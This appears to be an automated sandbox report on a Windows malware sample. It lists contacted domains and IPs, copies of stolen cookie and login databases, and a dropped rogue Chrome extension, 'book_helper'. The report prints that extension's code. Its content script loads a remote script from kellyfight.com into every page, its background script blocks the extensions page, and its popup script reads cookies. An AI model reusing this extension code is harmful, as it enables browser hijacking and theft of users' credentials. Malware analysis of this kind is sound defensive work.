watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:52:01	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.23.16	N1yprTBBXs.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	Cyfj6XGbkd.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	84CFBA021A5A6662.xyz/info_old/ddd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
84CFBA021A5A6662.xyz	N1yprTBBXs.exe	Get hash	malicious	Browse	104.21.23.16
	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
84cfba021a5a6662.xyz	N1yprTBBXs.exe	Get hash	malicious	Browse	104.21.23.16
	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	85H8KnUuMM.exe	Get hash	malicious	Browse	104.21.19.200
	PURCHASE ORDER.exe	Get hash	malicious	Browse	104.21.19.200
	POL 495.exe	Get hash	malicious	Browse	172.67.188.154
	N1yprTBBXs.exe	Get hash	malicious	Browse	104.21.23.16
	Cyfj6XGbkd.exe	Get hash	malicious	Browse	104.21.23.16
	Royalmail-Shipment.xls	Get hash	malicious	Browse	172.67.1.225
	N1yprTBBXs.exe	Get hash	malicious	Browse	172.67.208.74
	Royalmail-Shipment.xls	Get hash	malicious	Browse	172.67.1.225
	PO#PDT28394209.exe	Get hash	malicious	Browse	172.67.176.199
	c8TrAKsz0T.exe	Get hash	malicious	Browse	104.21.47.75
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	RddH6rLRfH.exe	Get hash	malicious	Browse	104.21.27.240
	Immuni.apk	Get hash	malicious	Browse	172.64.100.5
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse	104.21.23.16
	UGPK60taH6.dll	Get hash	malicious	Browse	104.20.184.68
	4PDNbYK5fj.exe	Get hash	malicious	Browse	172.67.169.213
	pmTdQ57tvM.exe	Get hash	malicious	Browse	172.67.169.213
	7BtV39hziI.exe	Get hash	malicious	Browse	104.21.27.240
	dc4AaqW6Aa.exe	Get hash	malicious	Browse	104.21.27.240
	lAy87VNPiL.exe	Get hash	malicious	Browse	104.21.27.240

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\MSIB2E9.tmp	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Cyfj6XGbkd.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Cookies1611971442537 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Cookies1611971454131 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\background.js Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.022683940423506
Encrypted:	false
SSDEEP:	24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5:	FEDACA056D174270824193D664E50A3F
SHA1:	58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256:	8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512:	2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious:	false
Preview:	$(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\book.js Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.039480985438208
Encrypted:	false
SSDEEP:	3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5:	30CBBF4DF66B87924C75750240618648
SHA1:	64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256:	D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512:	8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious:	false
Preview:	(function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon.png Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.79271055262892
Encrypted:	false
SSDEEP:	24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5:	5D207F5A21E55E47FCCD8EF947A023AE
SHA1:	3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256:	4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512:	38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious:	false
Preview:	.PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..\|z.Z_..b$...)...z.....\|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r]...... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:.......k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u\|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\icon48.png Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2235
Entropy (8bit):	7.880518016071819
Encrypted:	false
SSDEEP:	48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5:	E35B805293CCD4F74377E9959C35427D
SHA1:	9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:	2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:	6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O..!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B ..dh)...l.:\|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...\|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR\|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.\|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....\|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\jquery-1.8.3.min.js Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	93637
Entropy (8bit):	5.292996107428883
Encrypted:	false
SSDEEP:	1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:	E1288116312E4728F98923C79B034B67
SHA1:	8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:	BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:	BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:	false
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\manifest.json Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2380
Entropy (8bit):	5.687293760500434
Encrypted:	false
SSDEEP:	48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:	ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:	4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:	ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:	7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:	false
Preview:	{.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http:///", "https:///" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.html Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.048307538221611
Encrypted:	false
SSDEEP:	6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:	E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:	DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:	B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:	F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ihkencjepjngjffalaohcbnbeejhnoei\1.0.0.0_0\popup.js Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	4.985939227199713
Encrypted:	false
SSDEEP:	12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:	2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:	05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:	DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:	6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:	false
Preview:	$(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	5468
Entropy (8bit):	5.179918292604302
Encrypted:	false
SSDEEP:	96:nq6CbKM/XwdV0VPyk0JCKL8eGbOEQVuwv:nq6Cbh/gdV0y4K7
MD5:	5ACFF715A5B8B42709A2A0C27163797D
SHA1:	E691DBA97D90C5FC30BDB8882A85563FE99E9A3F
SHA-256:	E368CFA94D6889473F0FA238352B7CB407B2118CF7218D2A4333AB49BEC054B0
SHA-512:	706F872285FD197E9286AB73A90E2B39589336FD520280DCB4ED5D543C77BECFD30BD8D5342EED00258712AB453A45D9CCD6E3855881DE72704C0494A5BB417A
Malicious:	true
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13245951485918895","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0",

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	34636
Entropy (8bit):	5.538583769454702
Encrypted:	false
SSDEEP:	768:gEyOD1TUckPWAr+yLlCL1kXqKf/pUZNCgVLH2Hf6rUQGAnFhde:RdaLlvAnY
MD5:	A6895E7C05A9CF86DACAF3D4F14CF3A2
SHA1:	327432196588976104153983C1B086811F4E032E
SHA-256:	878A9AD11992074A559968919FB4A7B13DED12F0CD1C0429A33A0C82C5771F26
SHA-512:	316150B84E561E2EF6BB75CC11F00C64D4209D4DDE3E637B7BE4E19A999D5F1B07C406E3929080954AD1A5A319C92F35ADE8CF3B74593C1AFDB8886D4AC42544
Malicious:	true
Preview:	{"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245951492913444","lastpingday":"13245947458072931","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m

C:\Users\user\AppData\Local\Login Data1611971442537 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Login Data1611971453928 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1611971443850 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	37737
Entropy (8bit):	7.994967159065528
Encrypted:	true
SSDEEP:	768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5:	5A6469A3F787ABD2AE93B47470528F79
SHA1:	4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256:	1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512:	335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious:	false
Preview:	7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......\|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\.....f.q.=..t...).<\|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...\|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....\|..^.+RP]...D.jq.z'..4.\|I*......jq..w.%..2/\|.....>..y...>......C.)8B7$Z...{P.~..&...b..........

C:\Users\user\AppData\Local\Temp\1611971445897 Download File
Process:	C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	553040
Entropy (8bit):	7.999671101282436
Encrypted:	true
SSDEEP:	12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5:	A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1:	158501079514868D85246E970314A024FF263199
SHA-256:	18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
